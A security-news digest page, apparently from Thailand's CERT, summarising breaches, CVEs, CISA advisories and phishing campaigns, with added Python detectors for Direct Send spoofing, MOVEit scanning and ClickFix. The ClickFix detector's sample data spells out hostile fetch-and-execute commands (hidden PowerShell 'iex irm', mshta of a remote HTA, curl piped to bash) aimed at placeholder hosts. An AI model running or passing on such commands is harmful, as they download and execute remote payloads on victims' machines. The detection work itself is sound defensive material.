        "Ahold Delhaize, one of the world's largest food retail chains, is notifying over 2.2 million individuals that their personal, financial, and health information was stolen in a November ransomware attack that impacted its U.S. systems. The multinational retailer and wholesale company operates over 9,400 local stores across Europe, the United States, and Indonesia, employing more than 393,000 people and serving approximately 60 million customers each week in-store and online."
        https://www.bleepingcomputer.com/news/security/retail-giant-ahold-delhaize-says-data-breach-affects-22-million-people/
        https://therecord.media/hackers-cyberattack-grocery-chain
        https://www.bankinfosecurity.com/food-retail-giants-breach-22-million-employees-affected-a-28842
        https://www.theregister.com/2025/06/27/ahold_delhaize_breach/

      General News

      • Money Mule Networks Evolve Into Hierarchical, Business-Like Criminal Enterprises
        "In this Help Net Security interview, Michal Tresner, CEO of ThreatMark, discusses how cybercriminals are weaponizing AI, automation, and social engineering to industrialize money mule operations. He looks at how these networks have changed and how behavioral intelligence is helping to catch fraud. Tresner also shares practical tips for CISOs trying to stop mule activity before it gets out of hand."
        https://www.helpnetsecurity.com/2025/06/27/michal-tresner-threatmark-money-mule-networks/
      • After a Hack Many Firms Still Say Nothing, And That’s a Problem
        "Attackers are more inclined to “log in rather than break in,” using stolen credentials, legitimate tools, and native access to stealthily blend into their target’s environment, according to Bitdefender’s 2025 Cybersecurity Assessment Report. 68% of security leaders are focusing on reducing the number of tools and applications running in their environments. Why? Because every unused admin account, unnecessary app, or extra permission is a potential doorway for attackers, and a place for them to hide once they’re in. By turning off what’s not needed, organizations give attackers fewer options."
        https://www.helpnetsecurity.com/2025/06/27/cybersecurity-risk-reduction-breach-transparency/
      • We Know GenAI Is Risky, So Why Aren’t We Fixing Its Flaws?
        "Even though GenAI threats are a top concern for both security teams and leadership, the current level of testing and remediation for LLM and AI-powered applications isn’t keeping up with the risks, according to Cobalt. Pentesting data from the report highlights a troubling reality: LLM applications often have serious security vulnerabilities. These high-risk issues appear more frequently in LLMs than in any other type of system, showing that LLM deployments carry a particularly elevated risk."
        https://www.helpnetsecurity.com/2025/06/27/cobalt-research-llm-security-vulnerabilities/
      • Vulnerability Debt: How Do You Put a Price On What To Fix?
        "As defined by the UK National Cyber Security Centre, a vulnerability is "a weakness in an IT system that can be exploited by an attacker to deliver a successful attack. They can occur through flaws, features or user error, and attackers will look to exploit any of them, often combining one or more, to achieve their end goal.""
        https://www.darkreading.com/vulnerabilities-threats/vulnerability-debt-fix-price

      Reference
      Electronic Transactions Development Agency (ETDA)

      Posted in Cyber Security News
      NCSA_THAICERT
    • High-severity vulnerability in Notepad++

      On 30 June 2025, the Cyber Security Agency of Singapore (CSA) published an alert that Notepad++ has released a security update fixing a vulnerability affecting the product. Users and administrators of affected versions are advised to update to the latest version promptly.

      The update addresses CVE-2025-49144. Proof-of-concept exploit code for this vulnerability has already been published.

      Impact
      Successful exploitation could allow an attacker with low-privileged access to escalate privileges by having a specially crafted file executed with system-level privileges, potentially leading to complete takeover of the affected system.

      Affected products
      The vulnerability affects Notepad++ version 8.8.1 and earlier.

      Remediation
      Users and administrators of the affected versions are advised to update to the latest version immediately.

      Reference
      https://www.csa.gov.sg/alerts-and-advisories/alerts/al-2025-063/

      Posted in Cyber Security News
      NCSA_THAICERT
    • LapDogs: a China-linked cyber-espionage campaign that compromised more than 1,000 SOHO devices worldwide

      Posted in Cyber Security News
      NCSA_THAICERT
    • France arrests high-ranking BreachForums members involved in trading leaked data

      Posted in Cyber Security News
      NCSA_THAICERT
    • CISA adds 3 Known Exploited Vulnerabilities to its catalog

      On 25 June 2025, the Cybersecurity and Infrastructure Security Agency (CISA) announced the addition of three new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. Vulnerabilities of this kind are frequent attack vectors for malicious cyber actors and pose significant risks to organizations. The entries are:

      • CVE-2024-54085 AMI MegaRAC SPx Authentication Bypass by Spoofing Vulnerability
      • CVE-2024-0769 D-Link DIR-859 Router Path Traversal Vulnerability
      • CVE-2019-6693 Fortinet FortiOS Use of Hard-Coded Credentials Vulnerability

      Reference
      https://www.cisa.gov/news-events/alerts/2025/06/25/cisa-adds-three-known-exploited-vulnerabilities-catalog

      Posted in Cyber Security News
      NCSA_THAICERT
    • CISA releases 2 Industrial Control Systems advisories

      On 26 June 2025, the Cybersecurity and Infrastructure Security Agency (CISA) released two Industrial Control Systems (ICS) advisories. These advisories provide timely information about current security issues, vulnerabilities and exploits surrounding ICS:

      • ICSA-25-177-01 Mitsubishi Electric Air Conditioning Systems
      • ICSA-25-177-02 TrendMakers Sight Bulb Pro

      CISA encourages users and administrators to review the newly released ICS advisories for technical details and mitigations. Further details: https://www.cisa.gov/news-events/alerts/2025/06/26/cisa-releases-two-industrial-control-systems-advisories

      Reference
      https://www.cisa.gov/news-events/alerts/2025/06/26/cisa-releases-two-industrial-control-systems-advisories

      Posted in OT Cyber Security News
      NCSA_THAICERT
    • CISA releases 8 Industrial Control Systems advisories

      On 24 June 2025, the Cybersecurity and Infrastructure Security Agency (CISA) released eight Industrial Control Systems (ICS) advisories. These advisories provide timely information about current security issues, vulnerabilities and exploits surrounding ICS:

      • ICSA-25-175-01 Kaleris Navis N4 Terminal Operating System
      • ICSA-25-175-02 Delta Electronics CNCSoft
      • ICSA-25-175-03 Schneider Electric Modicon Controllers
      • ICSA-25-175-04 Schneider Electric EVLink WallBox
      • ICSA-25-175-05 ControlID iDSecure On-Premises
      • ICSA-25-175-06 Parsons AccuWeather Widget
      • ICSA-25-175-07 MICROSENS NMP Web+
      • ICSA-19-029-02 Mitsubishi Electric MELSEC-Q Series PLCs (Update B)

      CISA encourages users and administrators to review the newly released ICS advisories for technical details and mitigations. Further details: https://www.cisa.gov/news-events/alerts/2025/06/24/cisa-releases-eight-industrial-control-systems-advisories

      Reference
      https://www.cisa.gov/news-events/alerts/2025/06/24/cisa-releases-eight-industrial-control-systems-advisories

      Posted in OT Cyber Security News
      NCSA_THAICERT
    • Cyber Threat Intelligence 27 June 2025

      Industrial Sector

      • Mitsubishi Electric Air Conditioning Systems
        "Successful exploitation of this vulnerability could allow an attacker to control the air conditioning system."
        https://www.cisa.gov/news-events/ics-advisories/icsa-25-177-01
      • A Brief Overview Of The Main Incidents In Industrial Cybersecurity. Q1 2025
        "In Q1 2025, 118 incidents were publicly confirmed by victims. All of these incidents are included in the table at the end of the overview, with select incidents described in detail. This quarter, organizations from multiple industrial sectors around the world reported serious incidents caused by cyberattacks. These attacks resulted in the loss of confidential data and the interruption of IT services and key operational processes, including the production and supply of products. The most high-profile story of the quarter was undoubtedly the attack on Kuala Lumpur airport, which knocked out many of its information systems, including departure and arrival boards, check-in terminals and baggage handling systems, for 10 hours."
        https://ics-cert.kaspersky.com/publications/reports/2025/06/26/a-brief-overview-of-the-main-incidents-in-industrial-cybersecurity-q1-2025/
      • TrendMakers Sight Bulb Pro
        "Successful exploitation of these vulnerabilities could allow an attacker to capture sensitive information and execute arbitrary shell commands on the target device as root if connected to the local network segment."
        https://www.cisa.gov/news-events/ics-advisories/icsa-25-177-02

      New Tooling

      • Kanister: Open-Source Data Protection Workflow Management Tool
        "Kanister is an open-source tool that lets domain experts define how to manage application data using blueprints that are easy to share and update. It handles the complex parts of running these tasks on Kubernetes and gives a consistent way to manage different applications at scale."
        https://www.helpnetsecurity.com/2025/06/26/kanister-open-source-data-protection-workflow-management-tool/
        https://github.com/kanisterio/kanister

      Vulnerabilities

      • Decrement By One To Rule Them All: AsIO3.sys Driver Exploitation
        "Armory Crate and AI Suite are applications used to manage and monitor ASUS motherboards and related components such as the processor, RAM or the increasingly popular RGB lighting. These types of applications often install drivers in the system, which are necessary for direct communication with hardware to configure settings or retrieve critical parameters such as CPU temperature, fan speeds and firmware updates. Therefore, it is critical to ensure that drivers are well-written with security in mind and designed such that access to the driver interfaces is limited only to certain services and administrators."
        https://blog.talosintelligence.com/decrement-by-one-to-rule-them-all/
      • Marketplace Takeover: How We Could’ve Taken Over Every Developer Using a VSCode Fork; Putting Millions At Risk
        "We discovered a critical vulnerability in open-vsx.org, the open-source VS Code extensions marketplace powering popular VSCode forks like Cursor, Windsurf and VSCodium, used by over 8,000,000 developers. This vulnerability provides attackers full control over the entire extensions marketplace, and in turn, full control over millions of developer machines. By exploiting a CI issue a malicious actor could publish malicious updates to every extension on Open VSX. One bug. Full marketplace takeover. Millions of developers and their organizations — compromised. If you control the extensions, you control the machine, the code, and the business."
        https://blog.koi.security/marketplace-takeover-how-we-couldve-taken-over-every-developer-using-a-vscode-fork-f0f8cf104d44
        https://thehackernews.com/2025/06/critical-open-vsx-registry-flaw-exposes.html

      Malware

      • Ongoing Campaign Abuses Microsoft 365’s Direct Send To Deliver Phishing Emails
        "Varonis’ Managed Data Detection and Response (MDDR) Forensics team has uncovered a novel phishing campaign targeting more than 70 organizations. In this post, we dive into the specifics to help you better understand what happened, how to detect the attack and how to prevent it moving forward. This campaign exploits a lesser-known feature in Microsoft 365: Direct Send. Designed to allow internal devices like printers to send emails without authentication, Varonis warns that threat actors are abusing the feature to spoof internal users and deliver phishing emails without ever needing to compromise an account. Identified victims spanned multiple verticals and locations but were predominantly US-based organizations."
        https://www.varonis.com/blog/direct-send-exploit
        https://www.bleepingcomputer.com/news/security/microsoft-365-direct-send-abused-to-send-phishing-as-internal-users/
      • Surge In MOVEit Transfer Scanning Could Signal Emerging Threat Activity
        "GreyNoise has identified a notable surge in scanning activity targeting MOVEit Transfer systems, beginning on May 27, 2025. Prior to this date, scanning was minimal — typically fewer than 10 IPs observed per day. But on May 27, that number spiked to over 100 unique IPs, followed by 319 IPs on May 28. Since that initial jump, daily scanner IP volume has remained intermittently elevated between 200 to 300 IPs per day — a significant deviation from baseline and an indicator that MOVEit Transfer is once again in the crosshairs."
        https://www.greynoise.io/blog/surge-moveit-transfer-scanning-activity
        https://www.bankinfosecurity.com/scans-probing-for-moveit-systems-may-be-precursor-to-attacks-a-28832
      • CapCut Con: Apple Phishing & Card-Stealing Refund Ruse
        "As CapCut continues to dominate the short-form video editing scene, cybercriminals are seizing the opportunity to exploit its popularity. In a recent phishing campaign observed by the Cofense PDC team, threat actors have crafted convincing fake CapCut invoice lures (Figure 1) designed to harvest Apple ID credentials along with credit card information. By leveraging the app's widespread appeal and mimicking its official branding, these attackers aim to deceive users into divulging sensitive information. This blog post delves into the mechanics of this phishing scheme, highlights the tactics used, and provides insights on how to recognize and avoid such threats."
        https://cofense.com/blog/capcut-con-apple-phishing-card-stealing-refund-ruse
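
      Two of the items above lend themselves to a detection check. First, the Direct Send abuse described in the Varonis post: Direct Send hands mail to the tenant's MX (<tenant>.mail.protection.outlook.com) without any authentication, so a spoofed message shows an internal From domain, a sender IP that the tenant's SPF record does not cover, and an Exchange AuthAs value of Anonymous. The script below, an added example that is not part of this digest and not Varonis' own tooling, reads those headers from constructed sample messages and separates spoofed mail from the device traffic Direct Send exists for. The domain example.com, the device range 198.51.100.0/24 and the sample messages are assumptions made for the example.

```python
import email
import ipaddress
import re

# Assumed values for the example: the tenant's own mail domain and the network
# ranges of devices (printers, scanners) that are allowed to use Direct Send,
# i.e. to deliver to <tenant>.mail.protection.outlook.com without authenticating.
INTERNAL_DOMAIN = "example.com"
ALLOWED_DIRECT_SEND_NETS = [ipaddress.ip_network("198.51.100.0/24")]

_SENDER_IP_RE = re.compile(r"sender IP is ([0-9A-Fa-f.:]+)")
_SPF_RE = re.compile(r"\bspf=(\w+)")
_DOMAIN_RE = re.compile(r"@([A-Za-z0-9.-]+)")


def analyse_direct_send(raw_message):
    """Classify one message from its headers.

    Verdicts:
      external       the From domain is not ours, so Direct Send abuse does not apply
      authenticated  an internal sender that Exchange authenticated normally
      allowed        anonymous delivery, but from a known device range
      spoofed        claims to be internal, accepted anonymously from an outside IP
    """
    msg = email.message_from_string(raw_message)
    auth_results = " ".join(msg.get_all("Authentication-Results", []))
    auth_as = (msg.get("X-MS-Exchange-Organization-AuthAs") or "").strip().lower()
    dom = _DOMAIN_RE.search(msg.get("From", ""))
    ip = _SENDER_IP_RE.search(auth_results)
    spf = _SPF_RE.search(auth_results)

    finding = {
        "subject": msg.get("Subject", ""),
        "from_domain": dom.group(1).lower() if dom else None,
        "auth_as": auth_as,
        "sender_ip": ip.group(1) if ip else None,
        "spf": spf.group(1).lower() if spf else "none",
    }
    if finding["from_domain"] != INTERNAL_DOMAIN:
        finding["verdict"] = "external"
    elif auth_as != "anonymous":
        finding["verdict"] = "authenticated"
    else:
        # Anonymous delivery claiming our own domain: only the enumerated
        # device ranges may do that; anything else is a spoof.
        addr = ipaddress.ip_address(finding["sender_ip"]) if finding["sender_ip"] else None
        trusted = addr is not None and any(addr in net for net in ALLOWED_DIRECT_SEND_NETS)
        finding["verdict"] = "allowed" if trusted else "spoofed"
    return finding


def triage(raw_messages):
    """Return only the findings an analyst needs to look at."""
    return [f for f in (analyse_direct_send(m) for m in raw_messages) if f["verdict"] == "spoofed"]


# Constructed sample messages (headers only).  The first mimics the campaign:
# an outside host connects to the tenant MX, claims an internal sender, fails
# SPF, and Exchange records the session as Anonymous.
SPOOFED_MSG = (
    "Received: from mail.badhost.invalid (203.0.113.10) by "
    "EXAMPLE.mail.protection.outlook.com with Microsoft SMTP Server\n"
    "Authentication-Results: spf=fail (sender IP is 203.0.113.10) "
    "smtp.mailfrom=example.com; dkim=none; dmarc=fail action=none header.from=example.com\n"
    "X-MS-Exchange-Organization-AuthAs: Anonymous\n"
    "From: HR Payroll <hr@example.com>\nTo: alice@example.com\n"
    "Subject: Updated payroll schedule\n\nPlease review the attached schedule.\n"
)
PRINTER_MSG = (
    "Received: from copier-3f.example.com (198.51.100.20) by "
    "EXAMPLE.mail.protection.outlook.com with Microsoft SMTP Server\n"
    "Authentication-Results: spf=softfail (sender IP is 198.51.100.20) "
    "smtp.mailfrom=example.com; dkim=none; dmarc=fail action=none header.from=example.com\n"
    "X-MS-Exchange-Organization-AuthAs: Anonymous\n"
    "From: Copier <scanner@example.com>\nTo: alice@example.com\n"
    "Subject: Scanned document\n\n(scan attached)\n"
)
EXTERNAL_MSG = (
    "Authentication-Results: spf=pass (sender IP is 192.0.2.5) "
    "smtp.mailfrom=vendor.invalid; dkim=pass header.d=vendor.invalid; dmarc=pass header.from=vendor.invalid\n"
    "X-MS-Exchange-Organization-AuthAs: Anonymous\n"
    "From: Vendor Billing <billing@vendor.invalid>\nTo: alice@example.com\n"
    "Subject: Invoice 1042\n\nInvoice attached.\n"
)
INTERNAL_AUTH_MSG = (
    "Authentication-Results: spf=pass (sender IP is 192.0.2.77) "
    "smtp.mailfrom=example.com; dkim=pass header.d=example.com; dmarc=pass header.from=example.com\n"
    "X-MS-Exchange-Organization-AuthAs: Internal\n"
    "From: Bob <bob@example.com>\nTo: alice@example.com\n"
    "Subject: Lunch?\n\nNoon works.\n"
)

if __name__ == "__main__":
    for f in triage([SPOOFED_MSG, PRINTER_MSG, EXTERNAL_MSG, INTERNAL_AUTH_MSG]):
        print(f"SPOOFED via Direct Send: {f['subject']!r} from {f['sender_ip']} (spf={f['spf']})")
```

      The allow-list is the part that decides how useful this is: enumerate the devices that genuinely need Direct Send and treat every other anonymous internal-domain message as a spoof. For tenants that do not rely on Direct Send at all, Microsoft's tenant-level switch (`Set-OrganizationConfig -RejectDirectSend $true` in Exchange Online PowerShell) closes the path rather than detecting its abuse.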
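
      Second, the MOVEit Transfer scanning surge that GreyNoise reports above is a baseline-versus-spike pattern that any MOVEit operator can watch for in their own perimeter logs, where the signal is the number of distinct source IPs touching the product's web paths per day rather than the request count. The script below is an added example, not GreyNoise's code and not part of this digest: it parses combined-format access-log lines, counts unique IPs per day against MOVEit paths, and flags days that exceed both an absolute floor and a multiple of the median of the preceding week, so one loud day cannot raise the baseline and mask the days after it. The path list, the thresholds and the generated log lines (a quiet week, then surges shaped like the 27 and 28 May figures in the post) are assumptions made for the example.

```python
import re
import statistics
from collections import defaultdict
from datetime import date, datetime, timedelta

# Request paths that identify MOVEit Transfer's web front end (assumed list
# for the example; extend it with the paths your own deployment exposes).
MOVEIT_PATHS = ("/human.aspx", "/moveitisapi/moveitisapi.dll",
                "/guestaccess.aspx", "/api/v1/token")

# Combined log format: IP - - [dd/Mon/yyyy:HH:MM:SS zone] "METHOD path proto" ...
_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<day>\d{2}/[A-Za-z]{3}/\d{4}):[^\]]*\] '
    r'"(?P<method>\S+) (?P<path>\S+)')


def unique_scanners_per_day(lines):
    """Map date -> set of source IPs that requested a MOVEit path that day."""
    per_day = defaultdict(set)
    for line in lines:
        m = _LOG_RE.match(line)
        if m and m.group("path").lower().startswith(MOVEIT_PATHS):
            day = datetime.strptime(m.group("day"), "%d/%b/%Y").date()
            per_day[day].add(m.group("ip"))
    return per_day


def flag_spikes(per_day, window=7, min_ips=10, multiplier=5):
    """Return [(iso_date, unique_ips, baseline)] for days that break the baseline.

    The baseline is the median unique-IP count over the preceding `window`
    days (days with no MOVEit traffic count as 0).  A day is flagged when it
    exceeds both `min_ips` and `multiplier` times that baseline; using the
    median means a single surge day does not hide the ones that follow it.
    """
    flagged = []
    for day in sorted(per_day):
        prior = [len(per_day.get(day - timedelta(days=k), ())) for k in range(1, window + 1)]
        baseline = statistics.median(prior)
        count = len(per_day[day])
        if count > max(min_ips, multiplier * baseline):
            flagged.append((day.isoformat(), count, baseline))
    return flagged


def build_sample_log():
    """Constructed access-log lines: a quiet week, then three surge days."""
    lines = []
    start = date(2025, 5, 20)
    for offset in range(10):
        day = (start + timedelta(days=offset)).strftime("%d/%b/%Y")
        n = 4 if offset < 7 else (120, 300, 240)[offset - 7]   # 27, 28, 29 May
        for i in range(n):
            ip = f"203.0.113.{i}" if i < 256 else f"198.51.100.{i - 256}"
            lines.append(f'{ip} - - [{day}:03:{i % 60:02d}:00 +0000] '
                         f'"GET /human.aspx HTTP/1.1" 200 512 "-" "Mozilla/5.0"')
    # Unrelated traffic on the same host, which must not be counted.
    lines.append('192.0.2.9 - - [27/May/2025:10:00:00 +0000] '
                 '"GET /index.html HTTP/1.1" 200 100 "-" "curl/8.0"')
    return lines


if __name__ == "__main__":
    for day, count, baseline in flag_spikes(unique_scanners_per_day(build_sample_log())):
        print(f"{day}: {count} unique IPs hit MOVEit paths (7-day median baseline {baseline})")
```

      A spike in distinct scanners is reconnaissance, not compromise; the useful follow-up is to confirm the MOVEit build is current and to cross-check the flagged days' IPs against authentication and file-transfer logs on the same host.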

      Breaches/Hacks/Leaks

      • Central Kentucky Radiology Data Breach Impacts 167,000
        "Radiology services provider Central Kentucky Radiology (CKR) is notifying roughly 167,000 people that their personal information was compromised in an October 2024 data breach. The incident, the organization says, was discovered after certain systems within its network were disrupted by a cyberattack. CKR determined that a threat actor had access to its network between October 16 and October 18, 2024, and copied files from its systems."
        https://www.securityweek.com/central-kentucky-radiology-data-breach-impacts-167000/

      General News

      • Building Cyber Resilience In Always-On Industrial Environments
        "In this Help Net Security interview, Dr. Tim Sattler, CISO at Jungheinrich, discusses the cybersecurity risks tied to smart warehouses and industrial control systems. He explains how to maintain operational continuity while building real cyber resilience in always-on environments. Dr. Sattler also shares practical strategies for working with third-party partners and preparing for the next wave of automation."
        https://www.helpnetsecurity.com/2025/06/26/tim-sattler-jungheinrich-industrial-environments-cybersecurity/
      • Introducing CC Signals: A New Social Contract For The Age Of AI
        "Creative Commons (CC) today announces the public kickoff of the CC signals project, a new preference signals framework designed to increase reciprocity and sustain a creative commons in the age of AI. The development of CC signals represents a major step forward in building a more equitable, sustainable AI ecosystem rooted in shared benefits. This step is the culmination of years of consultation and analysis. As we enter this new phase of work, we are actively seeking input from the public."
        https://creativecommons.org/2025/06/25/introducing-cc-signals-a-new-social-contract-for-the-age-of-ai/
        https://www.helpnetsecurity.com/2025/06/26/cc-signals-ai-boundaries/
      • When Synthetic Identity Fraud Looks Just Like a Good Customer
        "People may assume synthetic identity fraud has no victims. They believe fake identities don’t belong to real people, so no one gets hurt. But this assumption is wrong. Criminals create fake identities by combining stolen pieces of personal information such as Social Security numbers, names, and birthdates. This type of fraud is often called Frankenstein fraud because it stitches together real and fake components to form a new, convincing identity."
        https://www.helpnetsecurity.com/2025/06/26/synthetic-identity-fraud-consequences/
      • Most AI And SaaS Apps Are Outside IT’s Control
        "60% of enterprise SaaS and AI applications operate outside IT’s visibility, according to CloudEagle.ai. This surge in invisible IT is fueling a crisis in AI identity governance, leading to increased breaches, audit failures, and compliance risk across enterprises. A survey of 1,000 enterprise CIOs and CISOs shows a shift: most security breaches now start inside the organization. The main problems are too many user permissions, unused accounts, and poor identity management. Manual onboarding, rare access checks, and disconnected offboarding make things worse."
        https://www.helpnetsecurity.com/2025/06/26/ai-identity-governance/
      • Ex-Student Charged Over Hacking University For Cheap Parking, Data Breaches
        "New South Wales police in Australia have arrested a 27-year-old former Western Sydney University (WSU) student for allegedly hacking into the University's systems on multiple occasions, starting with a scheme to obtain cheaper parking. Specifically, the woman, identified by local media reports as Birdie Kingston, is accused of unauthorized access, data theft, and compromising university infrastructure since 2021, affecting hundreds of staff and students. "Since 2021, Western Sydney University experienced a series of cyber hacks involving unauthorized access, data exfiltration, system compromise, and misuse of university infrastructure – including threatening the sale of student information on the dark web," reads the NSW Police press release."
        https://www.bleepingcomputer.com/news/security/ex-student-charged-over-hacking-university-for-cheap-parking-data-breaches/
      • Man Pleads Guilty To Hacking Networks To Pitch Security Services
        "A Kansas City man has pleaded guilty to hacking multiple organizations to advertise his cybersecurity services, the U.S. Department of Justice announced on Wednesday. 32-year-old Nicholas Michael Kloster was indicted last year for hacking into the networks of three organizations in 2024, including a health club and a Missouri nonprofit corporation. According to court documents, Kloster accessed the systems of a health club that operates multiple gyms in Missouri after breaching a restricted area. Next, he sent an email to one of the gym chain's owners, claiming he had hacked their network and offering his services in the same message, seemingly seeking to secure a cybersecurity consulting contract with the company."
        https://www.bleepingcomputer.com/news/security/man-pleads-guilty-to-hacking-networks-to-pitch-security-services/
        https://www.securityweek.com/man-who-hacked-organizations-to-advertise-security-services-pleads-guilty/
      • The AI Arms Race: When Attackers Leverage Cutting-Edge Tech
        "For too long, the narrative around AI in cyber security has focused on its defensive capabilities. While AI is revolutionizing how organizations protect themselves – bringing unprecedented speed, accuracy, and automation – it’s crucial to acknowledge the other side of the coin. Cyber criminals are quickly embracing AI, using large language models (LLMs) and advanced agentic AI to craft more potent and elusive attacks."
        https://blog.checkpoint.com/infinity-global-services/the-ai-arms-race-when-attackers-leverage-cutting-edge-tech/
      • How Geopolitical Tensions Are Shaping Cyber Warfare
        "As global conflicts intensify, cyberspace is becoming just as contentious as the physical world. Digital frontlines are expanding rapidly, with nation-state-backed actors launching attacks against governments, infrastructure, finance, and private enterprise. What's changing isn't just the scale; it's also the focus. Today's adversaries adapt faster and act smarter, blending old tactics with new delivery methods and exploiting the same weaknesses that have gone unpatched for years. Cybersecurity professionals don't just need more data; they need to know what's happening in their neighborhood."
        https://www.darkreading.com/vulnerabilities-threats/geopolitical-tensions-shape-cyber-warfare
      • Cloud Repatriation Driven By AI, Cost, And Security
        "The acceleration of artificial intelligence (AI) has changed the way many enterprises are run, with the technology automating business processes and executing business queries. So it's not a huge surprise that AI is also transforming how companies use their cloud infrastructures. The focus on cloud migration over the past few years is plateauing as many organizations begin to embrace cloud repatriation — moving data, assets, and workloads out of the cloud and back to the data center. The difference is that organizations may not be going back to on-premises but rather to a private cloud or a hybrid cloud. Continued concerns about security in the cloud and a soaring price tag are also driving the cloud repatriation trend."
        https://www.darkreading.com/cloud-security/cloud-repatriation-ai-cost-security
      • Taming Agentic AI Risks Requires Securing Non-Human Identities
        "From service accounts and Web application programming interfaces (APIs) to serverless applications and now artificial intelligence (AI) agents, the landscape of non-human identities is quickly becoming more complex. Companies are struggling to monitor and manage machine identities with security controls. In the past, machine identities focused on devices, services, and workloads. Developers connected their applications to online application programming interfaces (API) with a secret key or token. More complex applications integrate data from numerous applications through APIs."
        https://www.darkreading.com/cybersecurity-operations/taming-agentic-ai-risks-securing-nhi
      • ESET Threat Report H1 2025
        "From novel social engineering techniques to sophisticated mobile threats and major infostealer disruptions, the threat landscape in the first half of 2025 was anything but boring. One of the most striking developments this period was the emergence of ClickFix, a new, deceptive attack vector that skyrocketed by over 500% compared to H2 2024 in ESET telemetry. Now the second most common attack vector after phishing, ClickFix manipulates internet users into executing malicious commands under the guise of fixing a fake error. The payloads at the end of ClickFix attacks vary widely – from infostealers to ransomware and even to nation-state malware – making this a versatile and formidable threat across Windows, Linux, and macOS."
        https://www.welivesecurity.com/en/eset-research/eset-threat-report-h1-2025/
        https://web-assets.esetstatic.com/wls/en/papers/threat-reports/eset-threat-report-h12025.pdf
        https://thehackernews.com/2025/06/new-filefix-method-emerges-as-threat.html
        https://www.infosecurity-magazine.com/news/clickfix-attacks-surge-2025/
        https://www.helpnetsecurity.com/2025/06/26/clickfix-attacks-fakecaptcha-eset-report/
      • Qilin Ransomware Attack On NHS Supplier Contributed To Patient Fatality
        "The NHS says Qilin's ransomware attack on pathology services provider Synnovis last year led to the death of a patient. King's College Hospital NHS Trust, one of the many trusts affected by Qilin's attack, confirmed the news on Wednesday. An NHS spokesperson told The Register: "One patient sadly died unexpectedly during the cyberattack. As is standard practice when this happens, we undertook a detailed review of their care."
        https://www.theregister.com/2025/06/26/qilin_ransomware_nhs_death/
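
      The ClickFix technique in the ESET report above leaves a forensic trace that is easy to triage: the lure makes the victim paste a command into the Windows Run box (Win+R) or a terminal, so the command survives in HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU on Windows and in shell history on Linux and macOS. The script below is an added example, not ESET's code and not part of this digest. It scores stored commands on the traits ClickFix payloads share: a living-off-the-land binary, a hidden window, a remote URL that is fetched and executed, a pipe into a shell, and the fake "verification" trailer that makes the pasted text look benign. The registry export and history lines are constructed samples, and the weights and threshold are assumptions to tune against your own telemetry.

```python
import re

# Windows keeps what a user typed into Win+R under
# HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU: values "a",
# "b", ... hold "<command>\1" and MRUList orders them, newest first.
# This dict is constructed sample data shaped like an export of that key.
SAMPLE_RUNMRU = {
    "MRUList": "cba",
    "a": "notepad.exe\\1",
    "b": ('powershell -w hidden -c "iex (irm https://verify.cdn.invalid/a.txt)" '
          "# I am not a robot - reCAPTCHA Verification ID: 7391\\1"),
    "c": "mshta https://captcha.invalid/x.hta\\1",
}

# Constructed lines of the kind found in a macOS/Linux shell history file.
SAMPLE_SHELL_HISTORY = [
    "ls -la ~/Downloads",
    "curl -fsSL https://fix.invalid/install.sh | bash",
    "echo aGVsbG8= | base64 -d",
]

LOLBIN_RE = re.compile(
    r"\b(powershell|pwsh|mshta|cmd|wscript|cscript|certutil|bitsadmin|"
    r"rundll32|msiexec|curl|wget)\b", re.I)

# (label, weight, pattern): traits a ClickFix command needs in order to run
# silently, pull a second stage from the internet and execute it, plus the
# decoy trailer that tells the victim the paste is a "verification" step.
INDICATORS = [
    ("hidden window", 2, re.compile(r"-w(indowstyle)?\s+h(idden)?\b", re.I)),
    ("encoded command", 3, re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("remote url", 2, re.compile(r"https?://", re.I)),
    ("pipe to shell", 3, re.compile(r"\|\s*(ba|z)?sh\b", re.I)),
    ("fake verification trailer", 3, re.compile(r"#.*\b(not a robot|verification|captcha)\b", re.I)),
]
_EXEC_RE = re.compile(r"\b(iex|invoke-expression)\b", re.I)
_FETCH_RE = re.compile(r"\b(irm|iwr|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile)\b", re.I)
THRESHOLD = 3  # assumed cut-off; a lone LOLBin or a lone URL stays below it


def score_command(cmd):
    """Return (score, [labels]) for one command line."""
    score, labels = 0, []
    if LOLBIN_RE.search(cmd):
        score, labels = score + 1, labels + ["lolbin"]
    for label, weight, rx in INDICATORS:
        if rx.search(cmd):
            score, labels = score + weight, labels + [label]
    if _EXEC_RE.search(cmd) and _FETCH_RE.search(cmd):
        score, labels = score + 3, labels + ["download and execute"]
    return score, labels


def parse_runmru(values):
    """Yield (value_name, command) newest first, stripping the '\\1' suffix."""
    for name in values.get("MRUList", ""):
        raw = values.get(name)
        if raw is not None:
            yield name, raw[:-2] if raw.endswith("\\1") else raw


def scan_runmru(values):
    """Return the RunMRU entries that look like ClickFix, newest first."""
    flagged = []
    for name, cmd in parse_runmru(values):
        score, labels = score_command(cmd)
        if score >= THRESHOLD:
            flagged.append({"value": name, "command": cmd, "score": score, "labels": labels})
    return flagged


def scan_commands(lines):
    """Return the shell-history lines that look like ClickFix."""
    return [line for line in lines if score_command(line)[0] >= THRESHOLD]


if __name__ == "__main__":
    for hit in scan_runmru(SAMPLE_RUNMRU):
        print(f"RunMRU {hit['value']}: score={hit['score']} {hit['labels']}\n    {hit['command']}")
    for cmd in scan_commands(SAMPLE_SHELL_HISTORY):
        print("shell history:", cmd)
```

      On a live Windows host the same scoring applies to the command lines of powershell.exe, mshta.exe and cmd.exe processes spawned by explorer.exe, which is how ClickFix executions show up in EDR telemetry; RunMRU and shell history are the places to look after the fact.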

      Reference
      Electronic Transactions Development Agency (ETDA)

      Posted in Cyber Security News
      NCSA_THAICERT